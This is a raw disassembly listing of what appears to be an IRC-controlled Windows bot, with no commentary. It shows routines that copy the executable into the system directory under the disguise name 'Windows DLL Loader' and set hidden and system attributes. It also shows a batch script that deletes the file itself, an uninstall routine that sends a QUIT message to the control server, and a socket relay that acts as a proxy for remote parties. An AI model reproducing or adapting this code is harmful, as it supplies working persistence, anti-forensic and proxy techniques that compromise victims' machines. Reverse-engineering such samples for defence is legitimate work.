push offset a@echoOffDelete ; "@echo off\r\n:deleteagain\r\ndel /A:H /F %s"...
push ebx
call ds:dword_4111EC ; wsprintfA
add esp, 18h
lea eax, [ebp+var_4]
mov [ebp+var_4], esi
push esi
push eax
push ebx
call sub_410826 ; strlen
pop ecx
push eax
push ebx
push [ebp+arg_0]
call ds:dword_411070 ; WriteFile
push [ebp+arg_0]
call ds:dword_4110AC ; CloseHandle
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push offset aOpen ; "open"
push esi
call ds:dword_4111E4
push 1
pop eax
loc_4049B0: ; CODE XREF: sub_4048CF+90�j
pop edi
pop esi
pop ebx
leave
retn
sub_4048CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4049B5 proc near ; CODE XREF: seg000:loc_4106E4�p
var_36C = byte ptr -36Ch
var_268 = byte ptr -268h
var_164 = byte ptr -164h
var_60 = dword ptr -60h
var_30 = word ptr -30h
var_1C = byte ptr -1Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 36Ch
push ebx
push esi
push edi
call sub_40488C
mov esi, 104h
lea eax, [ebp+var_36C]
push esi
xor ebx, ebx
push eax
push ebx
call ds:dword_411094 ; GetModuleHandleA
push eax
call ds:dword_411098 ; GetModuleFileNameA
cmp off_412B54, ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
jz short loc_404A65
mov edi, offset off_412B54
mov [ebp+var_C], edi
loc_4049F9: ; CODE XREF: sub_4049B5+AE�j
inc [ebp+var_4]
lea eax, [ebp+var_268]
push esi
push eax
call ds:dword_411054 ; GetSystemDirectoryA
lea eax, [ebp+var_268]
push offset dword_412DB0
push eax
call sub_410856 ; _mbscat
push dword ptr [edi]
call sub_40AC4E
push dword ptr [edi]
lea eax, [ebp+var_268]
push eax
call sub_410856 ; _mbscat
push dword ptr [edi]
call sub_40AC15
lea eax, [ebp+var_36C]
push eax
lea eax, [ebp+var_268]
push eax
call sub_410C94 ; _strcmpi
add esp, 20h
test eax, eax
jz loc_404AF8
mov edi, [ebp+var_C]
inc [ebp+var_8]
add edi, 8
mov [ebp+var_C], edi
cmp [edi], ebx
jnz short loc_4049F9
loc_404A65: ; CODE XREF: sub_4049B5+3A�j
push [ebp+var_4]
push ebx
call sub_40AADE
pop ecx
mov edi, eax
pop ecx
lea eax, [ebp+var_164]
push esi
push eax
call ds:dword_411054 ; GetSystemDirectoryA
lea eax, [ebp+var_164]
push offset dword_412DB0
push eax
call sub_410856 ; _mbscat
push off_412B54[edi*8]
lea esi, ds:412B54h[edi*8]
call sub_40AC4E
push dword ptr [esi]
lea eax, [ebp+var_164]
push eax
call sub_410856 ; _mbscat
push dword ptr [esi]
call sub_40AC15
add esp, 18h
lea eax, [ebp+var_164]
push eax
call ds:dword_4110B8 ; DeleteFileA
lea eax, [ebp+var_164]
push ebx
push eax
lea eax, [ebp+var_36C]
push eax
call ds:dword_411068 ; CopyFileA
test eax, eax
jnz short loc_404B47
push offset dword_41885C
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 1
call sub_4047C0
add esp, 0Ch
jmp short loc_404B42
; ---------------------------------------------------------------------------
loc_404AF8: ; CODE XREF: sub_4049B5+9A�j
mov eax, [ebp+var_8]
mov esi, eax
shl esi, 3
push off_412B54[esi]
call sub_40AC4E
push off_412B58[esi]
call sub_40AC4E
push off_412B54[esi]
push off_412B58[esi]
push 1
call sub_4047C0
push off_412B54[esi]
call sub_40AC15
push off_412B58[esi]
call sub_40AC15
add esp, 1Ch
loc_404B42: ; CODE XREF: sub_4049B5+141�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_404B47: ; CODE XREF: sub_4049B5+12B�j
mov esi, ds:dword_4110B0
lea eax, [ebp+var_164]
push 4
push eax
call esi ; SetFileAttributesA
lea eax, [ebp+var_164]
push 2
push eax
call esi ; SetFileAttributesA
lea eax, [ebp+var_164]
push eax
call sub_404715
lea eax, [ebp+var_36C]
push eax
call sub_404863
push eax
call sub_4048CF
push 44h
lea eax, [ebp+var_60]
pop esi
push esi
push ebx
push eax
call sub_410850 ; memset
add esp, 18h
lea eax, [ebp+var_1C]
mov [ebp+var_60], esi
mov [ebp+var_30], bx
push eax
lea eax, [ebp+var_60]
push eax
push ebx
push ebx
push 28h
push 1
push ebx
lea eax, [ebp+var_164]
push ebx
push eax
push ebx
call ds:dword_411084 ; CreateProcessA
call ds:dword_411260 ; WSACleanup
push ebx
call sub_4108EC ; exit
sub_4049B5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404BC3 proc near ; CODE XREF: sub_402230+51D�p
; sub_40735A+A00�p ...
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
call sub_40488C
mov ebx, 104h
lea eax, [ebp+var_20C]
push ebx
xor edi, edi
push eax
push edi
call ds:dword_411094 ; GetModuleHandleA
push eax
call ds:dword_411098 ; GetModuleFileNameA
cmp off_412B54, edi
mov [ebp+var_4], edi
jz short loc_404C67
mov esi, offset off_412B54
mov edi, esi
loc_404C03: ; CODE XREF: sub_404BC3+A0�j
lea eax, [ebp+var_108]
push ebx
push eax
call ds:dword_411054 ; GetSystemDirectoryA
lea eax, [ebp+var_108]
push offset dword_412DB0
push eax
call sub_410856 ; _mbscat
push dword ptr [esi]
call sub_40AC4E
push dword ptr [esi]
lea eax, [ebp+var_108]
push eax
call sub_410856 ; _mbscat
push dword ptr [esi]
call sub_40AC15
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_108]
push eax
call sub_410C94 ; _strcmpi
add esp, 20h
test eax, eax
jz short loc_404CAF
inc [ebp+var_4]
add edi, 8
mov esi, edi
cmp dword ptr [edi], 0
jnz short loc_404C03
xor edi, edi
loc_404C67: ; CODE XREF: sub_404BC3+37�j
mov esi, offset dword_41885C
push esi
push offset aWindowsDllLoad ; "Windows DLL Loader"
push edi
call sub_4047C0
lea eax, [ebp+var_20C]
push eax
call sub_404863
push eax
call sub_4048CF
add esp, 14h
test eax, eax
jz loc_404D2E
push esi
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_408E60
pop ecx
pop ecx
call ds:dword_411260 ; WSACleanup
push edi
call ds:dword_411064 ; ExitProcess
loc_404CAF: ; CODE XREF: sub_404BC3+93�j
mov eax, [ebp+var_4]
mov esi, eax
shl esi, 3
push off_412B54[esi]
call sub_40AC4E
push off_412B58[esi]
call sub_40AC4E
push off_412B54[esi]
push off_412B58[esi]
push 0
call sub_4047C0
push off_412B54[esi]
call sub_40AC15
push off_412B58[esi]
call sub_40AC15
lea eax, [ebp+var_20C]
push eax
call sub_404863
push eax
call sub_4048CF
add esp, 24h
test eax, eax
jz short loc_404D2E
push offset dword_41885C
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_408E60
pop ecx
pop ecx
call ds:dword_411260 ; WSACleanup
push 0
call ds:dword_411064 ; ExitProcess
loc_404D2E: ; CODE XREF: sub_404BC3+CC�j
; sub_404BC3+14A�j
pop edi
pop esi
pop ebx
leave
retn
sub_404BC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D33 proc near ; DATA XREF: sub_404F90+F4�o
var_16D4 = byte ptr -16D4h
var_6D4 = byte ptr -6D4h
var_5D4 = dword ptr -5D4h
var_5CA = byte ptr -5CAh
var_5BA = byte ptr -5BAh
var_427 = byte ptr -427h
var_414 = byte ptr -414h
var_413 = byte ptr -413h
var_412 = dword ptr -412h
var_40C = byte ptr -40Ch
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 16D4h
call sub_4108B0
push ebx
push esi
push edi
push 1BDh
push [ebp+arg_0]
lea eax, [ebp+var_5D4]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
mov eax, [ebp+var_5D4]
mov edi, ds:dword_411258
add esp, 10h
xor ebx, ebx
lea ecx, [ebp+var_414]
mov [ebp+arg_0], eax
push ebx
push 408h
push ecx
push eax
call edi ; recv
cmp eax, ebx
jz loc_404F87
cmp eax, 0FFFFFFFFh
jz loc_404F87
cmp [ebp+var_414], 4
jnz short loc_404DAB
cmp [ebp+var_413], 1
jnz short loc_404DAB
push 1
pop esi
jmp short loc_404DAD
; ---------------------------------------------------------------------------
loc_404DAB: ; CODE XREF: sub_404D33+68�j
; sub_404D33+71�j
xor esi, esi
loc_404DAD: ; CODE XREF: sub_404D33+76�j
cmp [ebp+var_5CA], bl
jz short loc_404DD3
lea eax, [ebp+var_5CA]
push 10h
push eax
lea eax, [ebp+var_40C]
push eax
call sub_4108E0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_404DD3
xor esi, esi
loc_404DD3: ; CODE XREF: sub_404D33+80�j
; sub_404D33+9C�j
cmp [ebp+var_427], bl
jz short loc_404E1E
lea eax, [ebp+var_6D4]
push eax
push [ebp+arg_0]
call sub_403495
pop ecx
cmp esi, ebx
pop ecx
mov eax, offset byte_417B60
jnz short loc_404DFA
mov eax, offset dword_412EB8
loc_404DFA: ; CODE XREF: sub_404D33+C0�j
push eax
movzx eax, [ebp+var_414]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_5BA]
push offset dword_412E84
push eax
call sub_408D50
add esp, 14h
loc_404E1E: ; CODE XREF: sub_404D33+A6�j
cmp esi, ebx
jnz short loc_404E59
push 8
lea eax, [ebp+var_414]
push ebx
push eax
call sub_410850 ; memset
lea eax, [ebp+var_414]
push 8
push eax
mov [ebp+var_413], 5Bh
push [ebp+arg_0]
call sub_403D54
push [ebp+arg_0]
call sub_403D27
add esp, 1Ch
jmp loc_404F87
; ---------------------------------------------------------------------------
loc_404E59: ; CODE XREF: sub_404D33+ED�j
lea eax, [ebp+var_C]
push 0Ah
push eax
push [ebp+var_412]
call ds:dword_411248 ; htons
movzx eax, ax
push eax
call sub_410C9A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_C]
push 2710h
push ebx
push eax
push [ebp+var_412+2]
call ds:dword_411230 ; inet_ntoa
push eax
call sub_403BBB
mov [ebp+var_4], eax
push 8
lea eax, [ebp+var_414]
push ebx
push eax
call sub_410850 ; memset
add esp, 1Ch
cmp [ebp+var_4], ebx
jnz short loc_404ED5
lea eax, [ebp+var_414]
push 8
push eax
mov [ebp+var_413], 5Bh
push [ebp+arg_0]
call sub_403D54
push [ebp+arg_0]
call sub_403D27
add esp, 10h
jmp loc_404F87
; ---------------------------------------------------------------------------
loc_404ED5: ; CODE XREF: sub_404D33+178�j
lea eax, [ebp+var_414]
push 8
push eax
mov [ebp+var_413], 5Ah
push [ebp+arg_0]
call sub_403D54
add esp, 0Ch
mov esi, 1000h
loc_404EF5: ; CODE XREF: sub_404D33+240�j
push [ebp+arg_0]
call sub_403424
test eax, eax
pop ecx
jz short loc_404F30
push ebx
lea eax, [ebp+var_16D4]
push esi
push eax
push [ebp+arg_0]
call edi ; recv
cmp eax, ebx
jz short loc_404F75
cmp eax, 0FFFFFFFFh
jz short loc_404F75
push eax
lea eax, [ebp+var_16D4]
push eax
push [ebp+var_4]
call sub_403D54
add esp, 0Ch
test eax, eax
jz short loc_404F75
loc_404F30: ; CODE XREF: sub_404D33+1CD�j
push [ebp+var_4]
call sub_403424
test eax, eax
pop ecx
jz short loc_404F6B
push ebx
lea eax, [ebp+var_16D4]
push esi
push eax
push [ebp+var_4]
call edi ; recv
cmp eax, ebx
jz short loc_404F75
cmp eax, 0FFFFFFFFh
jz short loc_404F75
push eax
lea eax, [ebp+var_16D4]
push eax
push [ebp+arg_0]
call sub_403D54
add esp, 0Ch
test eax, eax
jz short loc_404F75
loc_404F6B: ; CODE XREF: sub_404D33+208�j
push 32h
call ds:dword_4110A4 ; Sleep
jmp short loc_404EF5
; ---------------------------------------------------------------------------
loc_404F75: ; CODE XREF: sub_404D33+1DF�j
; sub_404D33+1E4�j ...
push [ebp+arg_0]
call sub_403D27
push [ebp+var_4]
call sub_403D27
pop ecx
pop ecx
loc_404F87: ; CODE XREF: sub_404D33+52�j
; sub_404D33+5B�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_404D33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F90 proc near ; DATA XREF: sub_4050D1+8F�o
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_1B6 = byte ptr -1B6h
var_1A6 = byte ptr -1A6h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1C0h
push 1BDh
lea eax, [ebp+var_1C0]
push [ebp+arg_0]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
lea eax, [ebp+var_1BC]
push 1
push eax
call sub_4035FB
add esp, 18h
mov [ebp+arg_0], eax
test eax, eax
jnz short loc_404FE0
push [ebp+var_1C0]
call sub_406753
pop ecx
xor eax, eax
jmp locret_4050CD
; ---------------------------------------------------------------------------
loc_404FE0: ; CODE XREF: sub_404F90+3B�j
push ebx
push esi
lea eax, [ebp+var_1BC]
push edi
push eax
mov eax, [ebp+var_1C0]
push dword ptr [eax]
lea eax, [ebp+var_1A6]
push offset dword_412EC4
push eax
call sub_408D50
mov edi, 3E8h
push edi
push [ebp+arg_0]
call sub_40371E
add esp, 18h
loc_405014: ; CODE XREF: sub_404F90+11E�j
mov ebx, eax
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jnz loc_4050B3
test ebx, ebx
jz loc_4050B3
cmp ebx, 0FFFFFFFFh
jz short loc_4050A3
push 1BDh
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jnz short loc_40504C
push ebx
call sub_403D49
jmp short loc_4050A2
; ---------------------------------------------------------------------------
loc_40504C: ; CODE XREF: sub_404F90+B2�j
lea eax, [ebp+var_1BC]
mov [esi], ebx
push eax
lea eax, [esi+4]
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_1B6]
push eax
lea eax, [esi+0Ah]
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_1A6]
push 1A3h
push eax
lea eax, [esi+1Ah]
push eax
call sub_410838 ; memcpy
push esi
push offset sub_404D33
call sub_406541
add esp, 24h
test eax, eax
jnz short loc_4050A3
push esi
call sub_410832 ; free
push ebx
call sub_403D49
pop ecx
loc_4050A2: ; CODE XREF: sub_404F90+BA�j
pop ecx
loc_4050A3: ; CODE XREF: sub_404F90+A1�j
; sub_404F90+103�j
push edi
push [ebp+arg_0]
call sub_40371E
pop ecx
pop ecx
jmp loc_405014
; ---------------------------------------------------------------------------
loc_4050B3: ; CODE XREF: sub_404F90+90�j
; sub_404F90+98�j
push [ebp+arg_0]
call sub_4038E1
push [ebp+var_1C0]
call sub_406753
pop ecx
xor eax, eax
pop ecx
pop edi
pop esi
pop ebx
locret_4050CD: ; CODE XREF: sub_404F90+4B�j
leave
retn 4
sub_404F90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4050D1 proc near ; CODE XREF: sub_40735A+113�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_4]
test ebx, ebx
push esi
jnz short loc_405102
lea eax, [ebp+var_8]
push 0Ah
push eax
push 0FFFFh
push 401h
call sub_40AADE
pop ecx
pop ecx
push eax
call sub_410C9A ; _itoa
add esp, 0Ch
lea ebx, [ebp+var_8]
loc_405102: ; CODE XREF: sub_4050D1+C�j
push 1BDh
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40516E
lea eax, [esi+4]
push ebx
push eax
call sub_410820 ; _mbscpy
mov eax, [ebp+arg_8]
pop ecx
test eax, eax
pop ecx
jnz short loc_40512B
mov eax, offset byte_417B60
loc_40512B: ; CODE XREF: sub_4050D1+53�j
push edi
push 10h
push eax
lea eax, [esi+0Ah]
push eax
call sub_4052A6
mov edi, [ebp+arg_0]
push 1A3h
lea eax, [esi+1Ah]
push edi
push eax
call sub_410838 ; memcpy
xor eax, eax
add esp, 18h
cmp [edi+18Bh], al
push ebx
push offset dword_412EF8
setz al
push eax
push esi
push offset sub_404F90
call sub_40663C
add esp, 14h
pop edi
loc_40516E: ; CODE XREF: sub_4050D1+40�j
pop esi
pop ebx
leave
retn
sub_4050D1 endp
; =============== S U B R O U T I N E =======================================
sub_405172 proc near ; CODE XREF: sub_40B7A2+20E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
test esi, esi
mov edx, esi
jl short loc_405198
mov eax, [esp+4+arg_0]
lea ecx, [eax+esi*2]
loc_405184: ; CODE XREF: sub_405172+24�j
mov eax, [esp+4+arg_4]
mov al, [edx+eax]
mov [ecx], al
and byte ptr [ecx+1], 0
dec edx
dec ecx
dec ecx
test edx, edx
jge short loc_405184
loc_405198: ; CODE XREF: sub_405172+9�j
mov eax, esi
pop esi
retn
sub_405172 endp
; =============== S U B R O U T I N E =======================================
sub_40519C proc near ; CODE XREF: sub_40735A+182�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_410826 ; strlen
pop ecx
loc_4051A8: ; CODE XREF: sub_40519C+1B�j
test eax, eax
jz short loc_4051B9
dec eax
cmp byte ptr [eax+esi], 20h
jnz short loc_4051B9
and byte ptr [eax+esi], 0
jmp short loc_4051A8
; ---------------------------------------------------------------------------
loc_4051B9: ; CODE XREF: sub_40519C+E�j
; sub_40519C+15�j
pop esi
retn
sub_40519C endp
; =============== S U B R O U T I N E =======================================
sub_4051BB proc near ; CODE XREF: sub_40543F+C�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov edx, [esp+arg_0]
xor eax, eax
loc_4051C1: ; CODE XREF: sub_4051BB+14�j
mov cl, [edx]
test cl, cl
jz short locret_4051D1
cmp cl, [esp+arg_4]
jnz short loc_4051CE
inc eax
loc_4051CE: ; CODE XREF: sub_4051BB+10�j
inc edx
jmp short loc_4051C1
; ---------------------------------------------------------------------------
locret_4051D1: ; CODE XREF: sub_4051BB+A�j
retn
sub_4051BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4051D2 proc near ; CODE XREF: sub_4098BB+2A�p
; sub_4098BB+ED�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor esi, esi
push edi
cmp [ebp+arg_10], esi
jnz short loc_4051FB
push esi
push esi
push [ebp+arg_8]
call sub_410850 ; memset
push esi
push esi
push [ebp+arg_C]
call sub_410850 ; memset
add esp, 18h
xor eax, eax
jmp short loc_405271
; ---------------------------------------------------------------------------
loc_4051FB: ; CODE XREF: sub_4051D2+C�j
push [ebp+arg_0]
mov esi, [ebp+arg_4]
push esi
call sub_410820 ; _mbscpy
lea eax, [ebp+var_4]
push eax
push offset dword_412F18
push [ebp+arg_0]
call sub_405733
mov ebx, [ebp+arg_8]
add esp, 14h
push 1
mov [ebx], eax
mov eax, [ebp+arg_C]
pop edi
cmp [ebp+arg_10], edi
mov [eax], esi
jle short loc_40526E
mov [ebp+arg_8], eax
lea esi, [ebx+4]
sub [ebp+arg_8], ebx
loc_405236: ; CODE XREF: sub_4051D2+9A�j
xor eax, eax
cmp [esi-4], eax
jz short loc_405276
lea ecx, [ebp+var_4]
push ecx
push offset dword_412F18
push eax
call sub_405733
add esp, 0Ch
mov [esi], eax
test eax, eax
jz short loc_40525D
sub eax, [ebp+arg_0]
add eax, [ebp+arg_4]
jmp short loc_40525F
; ---------------------------------------------------------------------------
loc_40525D: ; CODE XREF: sub_4051D2+81�j
xor eax, eax
loc_40525F: ; CODE XREF: sub_4051D2+89�j
mov ecx, [ebp+arg_8]
inc edi
mov [ecx+esi], eax
add esi, 4
cmp edi, [ebp+arg_10]
jl short loc_405236
loc_40526E: ; CODE XREF: sub_4051D2+59�j
mov eax, [ebp+arg_10]
loc_405271: ; CODE XREF: sub_4051D2+27�j
; sub_4051D2+D2�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_405276: ; CODE XREF: sub_4051D2+69�j
mov esi, edi
imul esi, 3FFFFFFFh
add esi, [ebp+arg_10]
shl esi, 2
push esi
push eax
lea eax, [ebx+edi*4]
push eax
call sub_410850 ; memset
mov eax, [ebp+arg_C]
push esi
push 0
lea eax, [eax+edi*4]
push eax
call sub_410850 ; memset
add esp, 18h
lea eax, [edi-1]
jmp short loc_405271
sub_4051D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4052A6 proc near ; CODE XREF: sub_40110A+58�p
; sub_40110A+8C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_4052D0
cmp ecx, 1
jz short loc_4052CD
loc_4052BD: ; CODE XREF: sub_4052A6+25�j
mov al, [esi]
mov [edi], al
test al, al
jz short loc_4052D0
inc esi
inc edi
dec ecx
cmp ecx, 1
jnz short loc_4052BD
loc_4052CD: ; CODE XREF: sub_4052A6+15�j
mov byte ptr [edi], 0
loc_4052D0: ; CODE XREF: sub_4052A6+10�j
; sub_4052A6+1D�j
pop edi
pop esi
pop ebp
retn
sub_4052A6 endp
; =============== S U B R O U T I N E =======================================
sub_4052D4 proc near ; CODE XREF: sub_40678D+17�p
; sub_406868+1B�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
loc_4052D8: ; CODE XREF: sub_4052D4+15�j
mov cl, [eax]
test cl, cl
jz short loc_4052EE
cmp cl, 30h
jl short loc_4052EB
cmp byte ptr [eax], 39h
jg short loc_4052EB
inc eax
jmp short loc_4052D8
; ---------------------------------------------------------------------------
loc_4052EB: ; CODE XREF: sub_4052D4+D�j
; sub_4052D4+12�j
xor al, al
retn
; ---------------------------------------------------------------------------
loc_4052EE: ; CODE XREF: sub_4052D4+8�j
mov al, 1
retn
sub_4052D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4052F1 proc near ; CODE XREF: sub_401000+9C�p
; sub_40F11A+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
push edi
call sub_410826 ; strlen
mov ebx, [ebp+arg_4]
and [ebp+arg_8], 0
sub ebx, eax
pop ecx
mov [ebp+var_4], eax
js short loc_405349
mov esi, [ebp+arg_0]
loc_405313: ; CODE XREF: sub_4052F1+56�j
mov al, [esi]
mov cl, [edi]
cmp al, cl
jz short loc_40532F
movsx edx, al
movsx eax, cl
lea ecx, [eax+20h]
cmp edx, ecx
jz short loc_40532F
add eax, 0FFFFFFE0h
cmp edx, eax
jnz short loc_405340
loc_40532F: ; CODE XREF: sub_4052F1+28�j
; sub_4052F1+35�j
push [ebp+var_4]
push edi
push esi
call sub_410CA0 ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_405350
loc_405340: ; CODE XREF: sub_4052F1+3C�j
inc [ebp+arg_8]
inc esi
cmp [ebp+arg_8], ebx
jle short loc_405313
loc_405349: ; CODE XREF: sub_4052F1+1D�j
xor eax, eax
loc_40534B: ; CODE XREF: sub_4052F1+67�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_405350: ; CODE XREF: sub_4052F1+4D�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
add eax, ecx
jmp short loc_40534B
sub_4052F1 endp
; =============== S U B R O U T I N E =======================================
sub_40535A proc near ; CODE XREF: sub_406F40+CC�p
; sub_409A8C+C�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
mov cl, [esi]
loc_405363: ; CODE XREF: sub_40535A+1C�j
test cl, cl
jz short loc_405378
cmp cl, 0Dh
jz short loc_40537C
cmp cl, 0Ah
jz short loc_40537C
mov cl, [eax+esi+1]
inc eax
jmp short loc_405363
; ---------------------------------------------------------------------------
loc_405378: ; CODE XREF: sub_40535A+B�j
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40537C: ; CODE XREF: sub_40535A+10�j
; sub_40535A+15�j
push edi
xor ecx, ecx
lea edi, [eax+esi]
loc_405382: ; CODE XREF: sub_40535A+3A�j
mov dl, [edi+ecx]
cmp dl, 0Dh
jz short loc_40538F
cmp dl, 0Ah
jnz short loc_405396
loc_40538F: ; CODE XREF: sub_40535A+2E�j
and byte ptr [edi+ecx], 0
inc ecx
jmp short loc_405382
; ---------------------------------------------------------------------------
loc_405396: ; CODE XREF: sub_40535A+33�j
add eax, ecx
pop edi
add eax, esi
pop esi
retn
sub_40535A endp
; =============== S U B R O U T I N E =======================================
sub_40539D proc near ; CODE XREF: sub_40CF3E+4E�p
; sub_40CF3E+C6�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov cl, [eax]
inc eax
test cl, cl
jz short locret_4053B9
loc_4053A8: ; CODE XREF: sub_40539D+17�j
mov cl, [eax]
test cl, cl
jz short locret_4053B9
cmp cl, 20h
jz short loc_4053B6
inc eax
jmp short loc_4053A8
; ---------------------------------------------------------------------------
loc_4053B6: ; CODE XREF: sub_40539D+14�j
and byte ptr [eax], 0
locret_4053B9: ; CODE XREF: sub_40539D+9�j
; sub_40539D+F�j
retn
sub_40539D endp
; =============== S U B R O U T I N E =======================================
sub_4053BA proc near ; CODE XREF: sub_4058D7+21F�p
; sub_40849F+62�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
xor eax, eax
mov esi, ecx
loc_4053C8: ; CODE XREF: sub_4053BA+2A�j
mov dl, [esi]
cmp dl, 20h
jnz short loc_4053D8
test edi, edi
jnz short loc_4053E3
push 1
pop edi
jmp short loc_4053DA
; ---------------------------------------------------------------------------
loc_4053D8: ; CODE XREF: sub_4053BA+13�j
xor edi, edi
loc_4053DA: ; CODE XREF: sub_4053BA+1C�j
mov [eax+ecx], dl
inc eax
cmp byte ptr [esi], 0
jz short loc_4053E6
loc_4053E3: ; CODE XREF: sub_4053BA+17�j
inc esi
jmp short loc_4053C8
; ---------------------------------------------------------------------------
loc_4053E6: ; CODE XREF: sub_4053BA+27�j
cmp [esp+8+arg_8], 0
pop edi
pop esi
jz short locret_4053FE
loc_4053EF: ; CODE XREF: sub_4053BA+42�j
test eax, eax
jz short locret_4053FE
and byte ptr [eax+ecx], 0
dec eax
cmp byte ptr [eax+ecx], 20h
jz short loc_4053EF
locret_4053FE: ; CODE XREF: sub_4053BA+33�j
; sub_4053BA+37�j
retn
sub_4053BA endp
; =============== S U B R O U T I N E =======================================
sub_4053FF proc near ; CODE XREF: sub_40543F+41�p
; sub_40543F+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push ebx
push esi
push edi
mov edi, [esp+0Ch+arg_0]
xor eax, eax
mov ebx, edi
mov esi, ecx
sub ebx, ecx
loc_405412: ; CODE XREF: sub_4053FF+26�j
mov dl, [esi]
cmp dl, 2Eh
jz short loc_40542D
test dl, dl
jz short loc_405437
mov [ebx+esi], dl
inc eax
inc esi
cmp eax, 4
jl short loc_405412
xor eax, eax
loc_405429: ; CODE XREF: sub_4053FF+36�j
; sub_4053FF+3E�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40542D: ; CODE XREF: sub_4053FF+18�j
and byte ptr [eax+edi], 0
lea eax, [eax+ecx+1]
jmp short loc_405429
; ---------------------------------------------------------------------------
loc_405437: ; CODE XREF: sub_4053FF+1C�j
and byte ptr [eax+edi], 0
add eax, ecx
jmp short loc_405429
sub_4053FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40543F proc near ; CODE XREF: sub_405580+19�p
; sub_405580+38�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 2Eh
push esi
call sub_4051BB
pop ecx
cmp eax, 3
pop ecx
jg short loc_40547A
mov ecx, [ebp+arg_10]
mov edi, [ebp+arg_8]
xor ebx, ebx
mov [ecx], bl
mov ecx, [ebp+arg_C]
sub eax, ebx
mov [ecx], bl
mov ecx, [ebp+arg_4]
mov [edi], bl
mov [ecx], bl
jz short loc_4054AD
dec eax
jz short loc_40549C
dec eax
jz short loc_40548D
dec eax
jz short loc_40547E
loc_40547A: ; CODE XREF: sub_40543F+16�j
; sub_40543F+4C�j ...
xor eax, eax
jmp short loc_4054BE
; ---------------------------------------------------------------------------
loc_40547E: ; CODE XREF: sub_40543F+39�j
push esi
push ecx
call sub_4053FF
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_40547A
loc_40548D: ; CODE XREF: sub_40543F+36�j
push esi
push edi
call sub_4053FF
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_40547A
loc_40549C: ; CODE XREF: sub_40543F+33�j
push esi
push [ebp+arg_C]
